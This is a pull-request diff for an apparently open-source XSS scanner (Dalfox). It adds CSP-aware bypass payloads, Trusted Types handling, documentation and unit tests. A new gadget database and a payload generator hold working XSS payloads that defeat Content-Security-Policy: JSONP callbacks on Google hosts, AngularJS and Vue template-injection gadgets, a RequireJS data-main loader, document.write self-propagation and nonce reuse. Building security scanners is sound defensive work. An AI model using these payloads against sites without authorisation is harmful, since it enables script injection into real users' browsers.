### PR TITLE
feat(csp): strict-dynamic/nonce gadget payloads + Trusted Types awareness (#1097)

### DIFF
--- a/docs/content/guide/payloads.md
+++ b/docs/content/guide/payloads.md
@@ -19,7 +19,7 @@ Dalfox composes payloads from several families:
 | **Event handler** | `onmouseover=alert(1)` | Existing attribute value |
 | **DOM clobbering** | `<img id=x>` | Legacy DOM lookups |
 | **URL protocol** | `javascript:alert(1)` | `href`/`src`-like attributes |
-| **CSP bypass** | Nonce exfil, fallback origins | When CSP is relaxed |
+| **CSP bypass** | `strict-dynamic` script gadgets, nonce reuse, JSONP on allowed hosts | When the response carries a bypassable CSP |
 | **mXSS** | `<foreignobject>`/DOMPurify bypasses | Sanitizer-mutated DOM |
 | **Blind** | `<script src=//callback/></script>` | `--blind` is set |
 
@@ -36,6 +36,59 @@ During discovery Dalfox classifies each parameter by **injection context**, the 
 - Unknown → fallback mix of HTML + attribute
 
 This keeps request counts sane while maximising hit rate.
+
+## CSP-aware bypass payloads
+
+When the preflight stage sees a `Content-Security-Policy` (or `…-Report-Only`)
+header — or a `<meta http-equiv>` equivalent — Dalfox parses it and tailors the
+script-execution payloads to that policy's actual weaknesses. Payloads are only
+generated for the directives that are genuinely exploitable, so a target with no
+CSP (or a hardened one) sees no extra requests.
+
+| CSP shape | What Dalfox emits |
+|-----------|-------------------|
+| `unsafe-inline` / `unsafe-eval` | direct inline / `eval`-family payloads |
+| missing `base-uri` / `object-src` | `<base>` hijack / `<object>`/`<embed>` injection |
+| `data:` / `blob:` in `script-src` | `<script src=data:…>` / `Blob` URL loaders |
+| whitelisted CDN host | the matching JSONP / framework **script gadget** for that host |
+| `strict-dynamic` | DOM script-gadgets (RequireJS `data-main`, `document.write` self-propagation, AngularJS bootstrap) plus **nonce reuse** when a nonce is captured |
+
+Two modern shapes that earlier releases parsed but never acted on are now live:
+
+- **`strict-dynamic`.** Under `strict-dynamic` the browser ignores the host
+  allowlist, so a plain `<script src=allowed-host>` no longer loads. Dalfox
+  switches to DOM script-gadgets — payloads that get an already-trusted script
+  to create the attacker script — and, when the policy pins a nonce, emits a
+  `<script nonce=…>` reuse payload (effective when the nonce is static,
+  predictable, or reflected).
+- **Nonce / hash pinning.** `'nonce-…'` and `'sha256-…'` tokens are parsed and
+  used to classify the policy. A pure random-nonce/hash policy with no
+  `strict-dynamic` and no gadget host is treated as *hardened* — Dalfox does not
+  waste requests on it.
+
+The gadget set lives in an embedded, extensible database (JSONBee / H5SC /
+Google CSP-Evaluator shapes) rather than a hardcoded list, so coverage grows
+without touching the analyzer.
+
+## Trusted Types awareness
+
+[Trusted Types](https://web.dev/articles/trusted-types) is the primary DOM-XSS
+mitigation in hardened apps. Dalfox's AST DOM-XSS analyzer understands it:
+
+- A **strict** policy callback — `createPolicy('p', {createHTML: s => DOMPurify.sanitize(s)})`
+  — clears taint just like any other sanitizer, so values routed through
+  `p.createHTML(x)` no longer report.
+- A **permissive** default policy — the classic bypassable no-op
+  `createPolicy('default', {createHTML: x => x})` — is *not* mistaken for
+  protection; the finding is kept and flagged.
+- When the response CSP enforces `require-trusted-types-for 'script'` **and** the
+  page defines a strict `'default'` policy, the browser auto-sanitizes every
+  TrustedHTML sink — Dalfox suppresses those now-false-positive findings.
+
+The classifier is deliberately conservative: anything it can't prove safe stays
+permissive, so the finding is kept. Suppression never fires without enforcement,
+so a page that defines a default policy but forgets `require-trusted-types-for`
+still reports — no false negatives are introduced.
 
 ## Encoders
 

--- a/src/cmd/scan/analysis.rs
+++ b/src/cmd/scan/analysis.rs
@@ -168,6 +168,23 @@ pub(crate) async fn run_preflight_and_analysis(
                             if !hn.eq_ignore_ascii_case("content-security-policy") {
                                 csp.require_trusted_types_for = false;
                             }
+                            if crate::DEBUG.load(Ordering::Relaxed) {
+                                let class = if csp.is_hardened() {
+                                    "hardened (nonce/hash-only)"
+                                } else if csp.is_gadget_bypassable() {
+                                    "gadget-bypassable"
+                                } else {
+                                    "no script-execution bypass surface"
+                                };
+                                crate::ceprintln!(
+                                    "[csp] {} classified {} (strict-dynamic={}, nonces={}, trusted-types-enforced={})",
+                                    hn,
+                                    class,
+                                    csp.has_strict_dynamic,
+                                    csp.nonce_values.len(),
+                                    csp.require_trusted_types_for
+                                );
+                            }
                             target.csp_analysis = Some(csp);
                             __preflight_csp_header = Some((hn, hv));
                         }

--- a/src/cmd/scan/analysis.rs
+++ b/src/cmd/scan/analysis.rs
@@ -159,7 +159,16 @@ pub(crate) async fn run_preflight_and_analysis(
                         if let Some((hn, hv)) = preflight.csp_header {
                             __preflight_csp_present = true;
                             // Analyze CSP and store on target for bypass payload generation
-                            target.csp_analysis = Some(crate::payload::xss_csp_bypass::analyze_csp(&hv));
+                            let mut csp = crate::payload::xss_csp_bypass::analyze_csp(&hv);
+                            // A report-only CSP enforces nothing — it only emits
+                            // violation reports — so `require-trusted-types-for`
+                            // there must not drive Trusted Types suppression in
+                            // the AST analyzer (that would be a false negative).
+                            // Bypass-payload fields stay as parsed.
+                            if !hn.eq_ignore_ascii_case("content-security-policy") {
+                                csp.require_trusted_types_for = false;
+                            }
+                            target.csp_analysis = Some(csp);
                             __preflight_csp_header = Some((hn, hv));
                         }
                         // Store WAF detection result on target
@@ -504,6 +513,7 @@ pub(crate) async fn run_preflight_and_analysis(
                             &response_text,
                             target.url.as_str(),
                             &target.method,
+                            target.trusted_types_enforced(),
                         );
                     if !ast_batch.is_empty() {
                         let added = ast_batch.len();

--- a/src/mcp/mod.rs
+++ b/src/mcp/mod.rs
@@ -397,35 +397,42 @@ impl DalfoxMcp {
                         // hit the REST server, now fixed in both places.
                         if !scan_args.skip_ast_analysis {
                             let client = target.build_client_or_default();
-                            if let Ok(resp) = client.get(target.url.clone()).send().await
-                                && let Ok(body) = resp.text().await
-                            {
-                                let ast_batch =
+                            if let Ok(resp) = client.get(target.url.clone()).send().await {
+                                // Read CSP off the response before consuming the
+                                // body so a `require-trusted-types-for` page is
+                                // analyzed with the same Trusted Types awareness
+                                // the CLI gets from preflight.
+                                let trusted_types_enforced =
+                                    crate::scanning::csp_requires_trusted_types(resp.headers());
+                                if let Ok(body) = resp.text().await {
+                                    let ast_batch =
                                     crate::scanning::ast_integration::run_initial_ast_dom_analysis(
                                         &body,
                                         target.url.as_str(),
                                         &target.method,
+                                        trusted_types_enforced,
                                     );
-                                if !ast_batch.is_empty() {
-                                    let added = ast_batch.len();
-                                    let mut guard = results_arc.lock().await;
-                                    guard.extend(ast_batch);
-                                    findings_count
-                                        .fetch_add(added, std::sync::atomic::Ordering::Relaxed);
+                                    if !ast_batch.is_empty() {
+                                        let added = ast_batch.len();
+                                        let mut guard = results_arc.lock().await;
+                                        guard.extend(ast_batch);
+                                        findings_count
+                                            .fetch_add(added, std::sync::atomic::Ordering::Relaxed);
+                                    }
+                                    let ext_batch = crate::scanning::fetch_and_analyze_external_js(
+                                        &client,
+                                        &target,
+                                        &body,
+                                        scan_args.as_ref(),
+                                    )
+                                    .await;
+                                    crate::scanning::accumulate_findings(
+                                        &results_arc,
+                                        &findings_count,
+                                        ext_batch,
+                                    )
+                                    .await;
                                 }
-                                let ext_batch = crate::scanning::fetch_and_analyze_external_js(
-                                    &client,
-                                    &target,
-                                    &body,
-                                    scan_args.as_ref(),
-                                )
-                                .await;
-                                crate::scanning::accumulate_findings(
-                                    &results_arc,
-                                    &findings_count,
-                                    ext_batch,
-                                )
-                                .await;
                             }
                         }
 

--- a/src/payload/gadget_db.rs
+++ b/src/payload/gadget_db.rs
@@ -1,0 +1,154 @@
+//! Embedded script-gadget / JSONP database for CSP bypass payload generation.
+//!
+//! Replaces the former hand-rolled six-branch CDN allowlist in
+//! [`crate::payload::xss_csp_bypass`] with a single, extensible registry of
+//! well-known public CSP-bypass gadgets (JSONBee / cure53 H5SC / Google CSP
+//! Evaluator research). Two consumers read it:
+//!
+//! * **host-allowlist CSP** (no `strict-dynamic`): when `script-src` whitelists
+//!   a host, a JSONP endpoint or framework script-gadget served from that host
+//!   runs attacker JavaScript. [`gadgets_for_host`] returns the gadgets whose
+//!   host pattern matches an allowed origin.
+//! * **`strict-dynamic` CSP**: host allowlists are *ignored* by the browser, so
+//!   a plain `<script src=allowed-host>` no longer loads. The bypass survives
+//!   only through a *trusted* script that itself DOM-creates a new script
+//!   (`document.write` / `createElement('script')` / a loader like RequireJS or
+//!   AngularJS bootstrap). [`strict_dynamic_gadgets`] returns those DOM
+//!   script-gadget shapes.
+//!
+//! Keeping host-allowlist and strict-dynamic gadgets in one table (each entry
+//! flagged with `strict_dynamic`) means a single curated source of truth, and
+//! lets the payload generator emit only the gadgets that can actually fire for
+//! the observed CSP shape — so request volume never grows for CSPs the gadget
+//! can't bypass.
+
+/// A single CSP-bypass script gadget.
+#[derive(Debug, Clone, Copy)]
+pub struct ScriptGadget {
+    /// Lowercase host substrings that make this gadget reachable when present in
+    /// a `script-src` host allowlist. Matched with `allowed_origin.contains(p)`,
+    /// so a bare host (`code.jquery.com`) or a brand fragment (`jquery`) both
+    /// work. Empty for pure DOM gadgets that don't depend on a whitelisted host.
+    pub host_patterns: &'static [&'static str],
+    /// `true` when the gadget still fires under `strict-dynamic` — i.e. it works
+    /// by getting a *trusted* script to create the attacker script in the DOM,
+    /// not by a host-allowlisted `<script src>` load (which `strict-dynamic`
+    /// blocks). Such gadgets are emitted in the strict-dynamic branch regardless
+    /// of the (ignored) host allowlist.
+    pub strict_dynamic: bool,
+    /// Injection payload template. `{CLASS}` / `{ID}` are replaced with the
+    /// per-scan reflection markers so the verification stage can positively
+    /// identify its own element.
+    pub template: &'static str,
+    /// Short human-readable label naming the gadget.
+    pub label: &'static str,
+}
+
+/// The embedded gadget registry. All entries are public, well-documented CSP
+/// bypass primitives; none reach out to attacker infrastructure on their own.
+static GADGETS: &[ScriptGadget] = &[
+    // --- Google / Gstatic ---------------------------------------------------
+    ScriptGadget {
+        host_patterns: &["googleapis.com", "google.com", "gstatic.com"],
+        strict_dynamic: false,
+        template: "<script src=\"https://www.google.com/complete/search?client=chrome&q=xss&callback=alert\" class={CLASS}></script>",
+        label: "Google complete/search JSONP callback",
+    },
+    ScriptGadget {
+        host_patterns: &["accounts.google.com", "apis.google.com", "google.com"],
+        strict_dynamic: false,
+        template: "<script src=\"https://accounts.google.com/o/oauth2/revoke?callback=alert(1)\" class={CLASS}></script>",
+        label: "Google oauth2 revoke JSONP callback",
+    },
+    // --- AngularJS (template-injection gadget, also fires under strict-dynamic
+    //     once a trusted script bootstraps Angular which creates <script>s) ---
+    ScriptGadget {
+        host_patterns: &["angularjs.org", "angular", "cdnjs.cloudflare.com"],
+        strict_dynamic: true,
+        template: "<script src=\"https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js\" class={CLASS}></script><div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>",
+        label: "AngularJS 1.x ng-csp $eval gadget (cdnjs)",
+    },
+    ScriptGadget {
+        host_patterns: &["ajax.googleapis.com", "googleapis.com"],
+        strict_dynamic: true,
+        template: "<script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js\" class={CLASS}></script><div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>",
+        label: "AngularJS 1.x ng-csp $eval gadget (Google CDN)",
+    },
+    // --- jQuery -------------------------------------------------------------
+    ScriptGadget {
+        host_patterns: &["jquery", "code.jquery.com"],
+        strict_dynamic: false,
+        template: "<script src=\"https://code.jquery.com/jquery-3.6.0.min.js\" class={CLASS}></script><img src=x onerror=$.globalEval('alert(1)')>",
+        label: "jQuery globalEval gadget",
+    },
+    ScriptGadget {
+        host_patterns: &["jquery", "ajax.googleapis.com"],
+        strict_dynamic: false,
+        template: "<script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js\" class={CLASS}></script><div data-ng-jq class={ID}>{{}}</div>",
+        label: "jQuery on Google CDN",
+    },
+    // --- jsDelivr / unpkg (universal npm gadget) ----------------------------
+    ScriptGadget {
+        host_patterns: &["unpkg.com", "jsdelivr.net"],
+        strict_dynamic: true,
+        template: "<script src=\"https://cdn.jsdelivr.net/npm/angular@1.6.0/angular.min.js\" class={CLASS}></script><div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>",
+        label: "AngularJS via jsDelivr/unpkg npm mirror",
+    },
+    ScriptGadget {
+        host_patterns: &["unpkg.com", "jsdelivr.net"],
+        strict_dynamic: false,
+        template: "<script src=\"https://cdn.jsdelivr.net/npm/vue@2/dist/vue.min.js\" class={CLASS}></script><div id=app class={ID}>{{constructor.constructor('alert(1)')()}}</div>",
+        label: "Vue 2 template-injection gadget via jsDelivr/unpkg",
+    },
+    // --- RequireJS data-main (canonical strict-dynamic DOM gadget) ----------
+    ScriptGadget {
+        host_patterns: &[
+            "requirejs.org",
+            "cdnjs.cloudflare.com",
+            "jsdelivr.net",
+            "unpkg.com",
+        ],
+        strict_dynamic: true,
+        template: "<script data-main=\"data:text/javascript,alert(1)//{ID}\" src=\"https://cdnjs.cloudflare.com/ajax/libs/require.js/2.3.6/require.min.js\" class={CLASS}></script>",
+        label: "RequireJS data-main loader gadget",
+    },
+    // --- Generic DOM script-gadget (document.write reflection) --------------
+    ScriptGadget {
+        host_patterns: &[],
+        strict_dynamic: true,
+        template: "<script class={CLASS}>document.write('<scr'+'ipt src=data:text/javascript,alert(1)//{ID}></scr'+'ipt>')</script>",
+        label: "document.write self-propagating script gadget",
+    },
+];
+
+/// All registered gadgets.
+pub fn all() -> &'static [ScriptGadget] {
+    GADGETS
+}
+
+/// Gadgets reachable when `allowed_origin` (a value from a `script-src` host
+/// allowlist) is present. Used for CSPs *without* `strict-dynamic`, where a
+/// whitelisted host genuinely permits loading a `<script src>` from it.
+pub fn gadgets_for_host(allowed_origin: &str) -> impl Iterator<Item = &'static ScriptGadget> {
+    let origin = allowed_origin.to_ascii_lowercase();
+    GADGETS.iter().filter(move |g| {
+        !g.host_patterns.is_empty() && g.host_patterns.iter().any(|p| origin.contains(p))
+    })
+}
+
+/// Gadgets that survive `strict-dynamic` — DOM script-gadgets that get a trusted
+/// script to create the attacker script, independent of the (ignored) host
+/// allowlist.
+pub fn strict_dynamic_gadgets() -> impl Iterator<Item = &'static ScriptGadget> {
+    GADGETS.iter().filter(|g| g.strict_dynamic)
+}
+
+/// Render a gadget template, substituting the reflection markers.
+pub fn render(template: &str, class_marker: &str, id_marker: &str) -> String {
+    template
+        .replace("{CLASS}", class_marker)
+        .replace("{ID}", id_marker)
+}
+
+#[cfg(test)]
+mod tests;

--- a/src/payload/gadget_db.rs
+++ b/src/payload/gadget_db.rs
@@ -130,10 +130,38 @@ pub fn all() -> &'static [ScriptGadget] {
 /// allowlist) is present. Used for CSPs *without* `strict-dynamic`, where a
 /// whitelisted host genuinely permits loading a `<script src>` from it.
 pub fn gadgets_for_host(allowed_origin: &str) -> impl Iterator<Item = &'static ScriptGadget> {
-    let origin = allowed_origin.to_ascii_lowercase();
+    let lowered = allowed_origin.to_ascii_lowercase();
+    let host = extract_host(&lowered).to_string();
     GADGETS.iter().filter(move |g| {
-        !g.host_patterns.is_empty() && g.host_patterns.iter().any(|p| origin.contains(p))
+        !g.host_patterns.is_empty() && g.host_patterns.iter().any(|p| host_matches(&host, p))
     })
+}
+
+/// Extract the bare host from a CSP `script-src` source value: strips the
+/// scheme (`https://` or a leading `//`), any path/query/fragment, the port,
+/// and a leading `*.` wildcard label. Input is expected already lowercased.
+fn extract_host(origin: &str) -> &str {
+    let s = origin
+        .split_once("://")
+        .map(|(_, rest)| rest)
+        .unwrap_or(origin);
+    let s = s.strip_prefix("//").unwrap_or(s);
+    let s = s.split(['/', '?', '#']).next().unwrap_or(s);
+    let s = s.split(':').next().unwrap_or(s);
+    s.strip_prefix("*.").unwrap_or(s)
+}
+
+/// Match an allowlisted `host` against a gadget host pattern. A dotted pattern
+/// (a full domain like `googleapis.com`) is matched on a domain boundary — the
+/// host must equal it or be a subdomain — so `notgoogle.com` no longer matches
+/// `google.com`. A bare fragment (`jquery`, `angular`) keeps loose substring
+/// matching, since those intentionally catch any host serving that library.
+fn host_matches(host: &str, pattern: &str) -> bool {
+    if pattern.contains('.') {
+        host == pattern || host.ends_with(&format!(".{pattern}"))
+    } else {
+        host.contains(pattern)
+    }
 }
 
 /// Gadgets that survive `strict-dynamic` — DOM script-gadgets that get a trusted

--- a/src/payload/gadget_db/tests.rs
+++ b/src/payload/gadget_db/tests.rs
@@ -1,0 +1,133 @@
+use super::*;
+
+#[test]
+fn test_all_non_empty() {
+    assert!(!all().is_empty());
+}
+
+#[test]
+fn test_every_gadget_has_template_and_label() {
+    for g in all() {
+        assert!(
+            !g.template.is_empty(),
+            "gadget {} has empty template",
+            g.label
+        );
+        assert!(!g.label.is_empty(), "a gadget has an empty label");
+        // A gadget must be reachable somehow: either via a host allowlist or
+        // under strict-dynamic. An entry with neither would be dead.
+        assert!(
+            !g.host_patterns.is_empty() || g.strict_dynamic,
+            "gadget {} is unreachable (no host patterns and not strict-dynamic)",
+            g.label
+        );
+    }
+}
+
+#[test]
+fn test_host_patterns_are_lowercase() {
+    for g in all() {
+        for p in g.host_patterns {
+            assert_eq!(
+                *p,
+                p.to_ascii_lowercase(),
+                "host pattern {p:?} for {} must be lowercase (matching lowercases the origin)",
+                g.label
+            );
+        }
+    }
+}
+
+#[test]
+fn test_gadgets_for_host_matches_cdnjs() {
+    let hits: Vec<_> = gadgets_for_host("https://cdnjs.cloudflare.com").collect();
+    assert!(hits.iter().any(|g| g.template.contains("angular")));
+}
+
+#[test]
+fn test_gadgets_for_host_matches_google_jsonp() {
+    let hits: Vec<_> = gadgets_for_host("https://ajax.googleapis.com").collect();
+    assert!(
+        hits.iter()
+            .any(|g| g.template.contains("google.com/complete/search"))
+    );
+}
+
+#[test]
+fn test_gadgets_for_host_matches_jquery_globaleval() {
+    let hits: Vec<_> = gadgets_for_host("https://code.jquery.com").collect();
+    assert!(hits.iter().any(|g| g.template.contains("globalEval")));
+}
+
+#[test]
+fn test_gadgets_for_host_matches_jsdelivr() {
+    let hits: Vec<_> = gadgets_for_host("https://cdn.jsdelivr.net").collect();
+    assert!(hits.iter().any(|g| g.template.contains("jsdelivr.net")));
+}
+
+#[test]
+fn test_gadgets_for_host_unknown_returns_empty() {
+    let hits: Vec<_> = gadgets_for_host("https://example.com").collect();
+    assert!(hits.is_empty());
+}
+
+#[test]
+fn test_gadgets_for_host_is_case_insensitive() {
+    let hits: Vec<_> = gadgets_for_host("HTTPS://CODE.JQUERY.COM").collect();
+    assert!(!hits.is_empty());
+}
+
+#[test]
+fn test_strict_dynamic_gadgets_non_empty() {
+    let g: Vec<_> = strict_dynamic_gadgets().collect();
+    assert!(!g.is_empty());
+    assert!(g.iter().all(|x| x.strict_dynamic));
+}
+
+#[test]
+fn test_strict_dynamic_includes_requirejs_and_document_write() {
+    let g: Vec<_> = strict_dynamic_gadgets().collect();
+    assert!(g.iter().any(|x| x.template.contains("data-main")));
+    assert!(g.iter().any(|x| x.template.contains("document.write")));
+}
+
+#[test]
+fn test_pure_dom_gadget_has_no_host_patterns() {
+    // The document.write gadget must work regardless of host allowlist.
+    let dw = all()
+        .iter()
+        .find(|g| g.template.contains("document.write"))
+        .expect("document.write gadget present");
+    assert!(dw.host_patterns.is_empty());
+    assert!(dw.strict_dynamic);
+}
+
+#[test]
+fn test_render_substitutes_markers() {
+    let out = render("<x class={CLASS} id={ID}>", "CLS", "IDN");
+    assert_eq!(out, "<x class=CLS id=IDN>");
+    assert!(!out.contains("{CLASS}"));
+    assert!(!out.contains("{ID}"));
+}
+
+#[test]
+fn test_render_handles_repeated_markers() {
+    let out = render("{CLASS}-{CLASS}-{ID}", "C", "I");
+    assert_eq!(out, "C-C-I");
+}
+
+#[test]
+fn test_no_template_leaves_unrendered_marker_after_render() {
+    // Sanity: every embedded template, once rendered, has no leftover
+    // reflection-marker placeholders (guards against a typo like `{CLAS}`).
+    // Note: framework gadgets legitimately contain `{{ }}` interpolation, so we
+    // check specifically for the `{CLASS}` / `{ID}` tokens, not bare braces.
+    for g in all() {
+        let rendered = render(g.template, "cm", "im");
+        assert!(
+            !rendered.contains("{CLASS}") && !rendered.contains("{ID}"),
+            "gadget {} left an unrendered marker: {rendered}",
+            g.label
+        );
+    }
+}

--- a/src/payload/gadget_db/tests.rs
+++ b/src/payload/gadget_db/tests.rs
@@ -72,6 +72,53 @@ fn test_gadgets_for_host_unknown_returns_empty() {
 }
 
 #[test]
+fn test_gadgets_for_host_does_not_overmatch_lookalike_domain() {
+    // `notgoogle.com` merely *contains* `google.com` as a substring — a dotted
+    // domain pattern must match on a domain boundary, not loosely.
+    assert!(gadgets_for_host("https://notgoogle.com").next().is_none());
+    assert!(
+        gadgets_for_host("https://jsdelivr.net.evil.com")
+            .next()
+            .is_none()
+    );
+    assert!(
+        gadgets_for_host("https://cdnjs.cloudflare.com.attacker.test")
+            .next()
+            .is_none()
+    );
+}
+
+#[test]
+fn test_gadgets_for_host_matches_subdomain_of_domain_pattern() {
+    // A genuine subdomain of a dotted pattern still matches.
+    assert!(
+        gadgets_for_host("https://ajax.googleapis.com")
+            .next()
+            .is_some()
+    );
+    assert!(
+        gadgets_for_host("https://sub.cdn.jsdelivr.net")
+            .next()
+            .is_some()
+    );
+}
+
+#[test]
+fn test_gadgets_for_host_strips_port_and_path() {
+    assert!(
+        gadgets_for_host("https://code.jquery.com:443/jquery.js")
+            .next()
+            .is_some()
+    );
+}
+
+#[test]
+fn test_gadgets_for_host_handles_wildcard_and_schemeless() {
+    assert!(gadgets_for_host("*.googleapis.com").next().is_some());
+    assert!(gadgets_for_host("//cdn.jsdelivr.net").next().is_some());
+}
+
+#[test]
 fn test_gadgets_for_host_is_case_insensitive() {
     let hits: Vec<_> = gadgets_for_host("HTTPS://CODE.JQUERY.COM").collect();
     assert!(!hits.is_empty());

--- a/src/payload/mod.rs
+++ b/src/payload/mod.rs
@@ -1,3 +1,4 @@
+pub mod gadget_db;
 pub mod js_breakout;
 pub mod mining;
 pub mod remote;

--- a/src/payload/xss_csp_bypass.rs
+++ b/src/payload/xss_csp_bypass.rs
@@ -326,13 +326,16 @@ pub fn get_csp_bypass_payloads(analysis: &CspAnalysis) -> Vec<String> {
     if analysis.has_strict_dynamic {
         // Nonce reuse: an injected <script> bearing a captured nonce executes
         // when that nonce is static / predictable / reflected into the sink.
+        // The nonce value is quoted: base64 nonces routinely contain `=` (and
+        // sometimes `+`/`/`), which are invalid in an unquoted HTML attribute
+        // value and would truncate the nonce so it no longer matches the CSP.
         for nonce in &analysis.nonce_values {
             payloads.push(format!(
-                "<script nonce={} class={}>alert(1)</script>",
+                "<script nonce=\"{}\" class={}>alert(1)</script>",
                 nonce, class_marker
             ));
             payloads.push(format!(
-                "<script nonce={} src=\"data:text/javascript,alert(1)\" id={}></script>",
+                "<script nonce=\"{}\" src=\"data:text/javascript,alert(1)\" id={}></script>",
                 nonce, id_marker
             ));
         }

--- a/src/payload/xss_csp_bypass.rs
+++ b/src/payload/xss_csp_bypass.rs
@@ -6,8 +6,11 @@
 //! - Missing `base-uri`: `<base>` tag injection to redirect relative URLs
 //! - Missing `object-src`: Plugin-based execution
 //! - Whitelisted CDN domains: JSONP/Angular/etc. gadgets on allowed origins
+//!   (sourced from [`crate::payload::gadget_db`])
 //! - `data:` scheme allowed in script-src
-//! - `strict-dynamic` with nonce/hash: Script gadget injection
+//! - `strict-dynamic` with nonce/hash: DOM script-gadget injection + nonce reuse
+//! - `require-trusted-types-for` / `trusted-types`: parsed for awareness so a
+//!   nonce/hash-only CSP is classified hardened-vs-gadget-bypassable
 
 use crate::scanning::markers;
 
@@ -23,6 +26,68 @@ pub struct CspAnalysis {
     pub missing_object_src: bool,
     pub missing_script_src: bool,
     pub whitelisted_domains: Vec<String>,
+    /// Base64 values of every `'nonce-…'` source expression in `script-src`
+    /// (the token between `'nonce-` and the closing quote, case preserved).
+    /// A reflected or otherwise predictable nonce lets an injected
+    /// `<script nonce=…>` execute even under `strict-dynamic`.
+    pub nonce_values: Vec<String>,
+    /// Full `sha256-…` / `sha384-…` / `sha512-…` tokens (without the quotes)
+    /// from `script-src`. Presence marks a hash-pinned CSP.
+    pub hash_values: Vec<String>,
+    /// `true` when `require-trusted-types-for 'script'` is enforced, so the
+    /// browser routes every DOM-XSS sink string through a Trusted Types policy.
+    /// Threaded into the AST DOM analyzer to gate default-policy suppression.
+    pub require_trusted_types_for: bool,
+    /// The `trusted-types` directive's allow-list values when present
+    /// (policy names, plus keywords like `'none'` / `'allow-duplicates'` with
+    /// quotes stripped). `Some(empty)` means `trusted-types;` with no value,
+    /// which forbids creating any policy. `None` means the directive is absent.
+    pub trusted_types: Option<Vec<String>>,
+}
+
+impl CspAnalysis {
+    /// `true` when `script-src` is pinned to nonces and/or hashes — the modern
+    /// allowlist-free shape. On its own this is the *hardened* form; it only
+    /// becomes gadget-bypassable when paired with `strict-dynamic`, a reflected
+    /// nonce, or a whitelisted host (see [`is_gadget_bypassable`]).
+    ///
+    /// [`is_gadget_bypassable`]: CspAnalysis::is_gadget_bypassable
+    pub fn is_nonce_or_hash_based(&self) -> bool {
+        !self.nonce_values.is_empty() || !self.hash_values.is_empty()
+    }
+
+    /// `true` when the script policy is realistically defeatable by a script
+    /// gadget: `unsafe-inline`/`unsafe-eval` (trivially), a `strict-dynamic`
+    /// policy (DOM script-gadget), or a whitelisted host that serves a known
+    /// JSONP/gadget endpoint.
+    ///
+    /// A bare nonce/hash is deliberately *not* treated as bypassable here: a
+    /// per-response random nonce is the hardened shape, and nonce reuse only
+    /// works when the nonce is predictable or reflected — a contingency we
+    /// can't read off the header. (Under `strict-dynamic` we still emit a
+    /// best-effort reuse payload, but that path is gated on `has_strict_dynamic`.)
+    pub fn is_gadget_bypassable(&self) -> bool {
+        if self.missing_script_src || self.has_unsafe_inline || self.has_unsafe_eval {
+            return true;
+        }
+        if self.has_strict_dynamic {
+            return true;
+        }
+        self.whitelisted_domains.iter().any(|d| {
+            crate::payload::gadget_db::gadgets_for_host(d)
+                .next()
+                .is_some()
+        })
+    }
+
+    /// `true` when `script-src` is a genuinely hardened nonce/hash policy with
+    /// no escape hatch we know how to bypass: nonce/hash based, no
+    /// `strict-dynamic`, no `unsafe-*`, and no whitelisted gadget host. Useful
+    /// for reporting/telemetry; the payload generator simply emits nothing
+    /// actionable in this case.
+    pub fn is_hardened(&self) -> bool {
+        self.is_nonce_or_hash_based() && !self.is_gadget_bypassable()
+    }
 }
 
 /// Parse a CSP header value into an analysis struct.
@@ -64,7 +129,17 @@ pub fn analyze_csp(csp_value: &str) -> CspAnalysis {
                     if lower == "blob:" {
                         analysis.allows_blob_scheme = true;
                     }
-                    // Collect whitelisted domains (not keywords)
+                    // `'nonce-<base64>'` — capture the base64 (case-sensitive,
+                    // so read from the original token, not the lowercased one).
+                    if let Some(nonce) = parse_nonce_token(v, &lower) {
+                        analysis.nonce_values.push(nonce);
+                    }
+                    // `'sha256-…'` / `'sha384-…'` / `'sha512-…'`.
+                    if let Some(hash) = parse_hash_token(v, &lower) {
+                        analysis.hash_values.push(hash);
+                    }
+                    // Collect whitelisted domains (not keywords). Nonce/hash
+                    // tokens start with `'` so they're excluded here too.
                     if !lower.starts_with('\'')
                         && lower != "data:"
                         && lower != "blob:"
@@ -92,6 +167,25 @@ pub fn analyze_csp(csp_value: &str) -> CspAnalysis {
             "object-src" => {
                 has_object_src = true;
             }
+            "require-trusted-types-for" => {
+                // The only defined value is `'script'`; its presence enforces
+                // Trusted Types on DOM-XSS sinks.
+                for v in &values {
+                    if v.trim_matches('\'').eq_ignore_ascii_case("script") {
+                        analysis.require_trusted_types_for = true;
+                    }
+                }
+            }
+            "trusted-types" => {
+                // Record the allow-list (policy names / keywords, quotes
+                // stripped). `trusted-types;` with no value → `Some(empty)`.
+                let collected: Vec<String> = values
+                    .iter()
+                    .map(|s| s.trim_matches('\'').to_string())
+                    .filter(|s| !s.is_empty())
+                    .collect();
+                analysis.trusted_types = Some(collected);
+            }
             _ => {}
         }
     }
@@ -101,6 +195,32 @@ pub fn analyze_csp(csp_value: &str) -> CspAnalysis {
     analysis.missing_object_src = !has_object_src;
 
     analysis
+}
+
+/// Extract the base64 payload of a `'nonce-<base64>'` source expression. The
+/// nonce is case-sensitive, so it is sliced from the original `token` while the
+/// already-lowercased `lower` drives the (case-insensitive) prefix/suffix match.
+fn parse_nonce_token(token: &str, lower: &str) -> Option<String> {
+    const PREFIX: &str = "'nonce-";
+    if lower.starts_with(PREFIX) && lower.ends_with('\'') && token.len() > PREFIX.len() {
+        let inner = &token[PREFIX.len()..token.len() - 1];
+        if !inner.is_empty() {
+            return Some(inner.to_string());
+        }
+    }
+    None
+}
+
+/// Extract a `sha256-…` / `sha384-…` / `sha512-…` token (algorithm prefix kept,
+/// surrounding quotes dropped) from a hash source expression.
+fn parse_hash_token(token: &str, lower: &str) -> Option<String> {
+    let is_hash = lower.starts_with("'sha256-")
+        || lower.starts_with("'sha384-")
+        || lower.starts_with("'sha512-");
+    if is_hash && lower.ends_with('\'') && token.len() > 2 {
+        return Some(token[1..token.len() - 1].to_string());
+    }
+    None
 }
 
 /// Generate CSP bypass payloads based on CSP analysis.
@@ -198,43 +318,59 @@ pub fn get_csp_bypass_payloads(analysis: &CspAnalysis) -> Vec<String> {
         ));
     }
 
-    // Known CDN JSONP/gadget endpoints on whitelisted domains
-    for domain in &analysis.whitelisted_domains {
-        let d = domain.to_ascii_lowercase();
-        // Google CDN / APIs — common JSONP endpoints
-        if d.contains("googleapis.com") || d.contains("google.com") || d.contains("gstatic.com") {
+    // Script gadgets. `strict-dynamic` makes the browser *ignore* the host
